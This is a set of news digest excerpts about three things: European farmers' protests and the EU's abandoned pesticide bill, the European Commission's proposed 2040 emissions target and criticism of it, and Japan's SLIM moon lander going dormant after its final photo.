The farmers' protests in Europe are a harbinger of the next big political challenge in global climate action: How to grow food without further damaging Earth's climate and biodiversity. From a report: On Tuesday, after weeks of intense protests in several cities across the continent, came the most explicit sign of that difficulty. The European Union's top official, Ursula von der Leyen, abandoned an ambitious bill to reduce the use of chemical pesticides and softened the European Commission's next raft of recommendations on cutting agricultural pollution. "We want to make sure that in this process, the farmers remain in the driving seat," she said at the European Parliament. "Only if we achieve our climate and environmental goals together will farmers be able to continue to make a living."

The farmers argue they're being hit from all sides: high fuel costs, green regulations, unfair competition from producers in countries with fewer environmental restrictions. Nonetheless, agriculture accounts for 30 percent of global greenhouse gas emissions, and it's impossible for the European Union to meet its ambitious climate targets, enshrined in law, without making dramatic changes to its agricultural system, including how farmers use chemical pesticides and fertilizers, as well as its vast livestock industry. It also matters politically. Changing Europe's farming practices is proving to be extremely difficult, particularly as parliamentary elections approach in June. Farmers are a potent political force, and food and farming are potent markers of European identity. Agriculture accounts for just over 1 percent of the European economy and employs 4 percent of its population. But it gets one-third of the E.U. budget, mostly as subsidies.

The European Commission today recommended reducing carbon dioxide emissions from fossil fuels by 90 percent by 2040 compared to 1990 levels. From a report: At face value, it's an ambitious target for transforming the European Union's energy system. As always, though, the devil is in the details. And the proposed plan is already garnering a range of strong reactions. A formal proposal still needs to be issued, but it has already faced pushback on how much of those pollution cuts should come from risky tactics aimed at capturing rather than preventing pollution. Some environmental groups are also criticizing a glaring omission in the draft: while it mentions phasing out coal, there's no strategy to phase out oil and gas.

"You can set targets to cut greenhouse gases as high as you like, but without a clear plan to phase-out the fossil fuels that are producing them they simply aren't credible. It's like building a bike without pedals, how are you going to power it?" Dominic Eagleton, senior fossil fuels campaigner at the nonprofit Global Witness, said in a statement today. The world actually came tantalizingly close to a deal to phase out fossil fuels during a United Nations climate conference in Dubai last December. Despite dozens of countries pushing for that kind of commitment, the agreement ultimately calls for "transitioning away from fossil fuels in energy systems, in a just, orderly and equitable manner." It also carves out room for controversial technologies for capturing carbon dioxide pollution.

"Japan's first moon mission has likely come to an end after a surprising late-game comeback," reports Mashable, "with the spacecraft taking one last photo of its surroundings before the deep-freeze of night... showing ominous shadows cast upon a slope of the Shioli crater, its landing site on the near side of the moon." Since Monday, the spacecraft has analyzed rocks around the crater with a multi-band spectral camera. JAXA picked the landing spot because of what it could tell scientists about the moon's formation... The special camera completed its planned observation, able to study more targets than originally expected, according to an English translation of a news release from the space agency... "Based on the large amount of data we have obtained, we are proceeding with (analyses) to identify rocks and estimate the chemical composition of minerals, which will help solve the mystery of the origin of the moon," JAXA said in a statement translated by Google...

The spacecraft has now entered a dormant state, prompted by nightfall on the moon. Because one rotation of the moon is about 27 Earth days, the so-called "lunar night," when the moon is no longer receiving sunlight, lasts about two weeks. Not much can survive the -270 degrees Fahrenheit brought on by darkness — not even robots. In this freezing temperature, soldered joints on hardware and mechanical parts break, and batteries die. But rest assured, the JAXA team will try to communicate with its scrappy moon lander when the sun rises again.
In mid-week Japan's space agency posted that "Although SLIM was not designed for the harsh lunar nights, we plan to try to operate again from mid-February, when the Sun will shine again on SLIM's solar cells."

Later they posted that they'd sent a command to turn on SLIM's communicator again "just in case, but with no response, we confirmed SLIM had entered a dormant state. This is the last scene of the Moon taken by SLIM before dusk."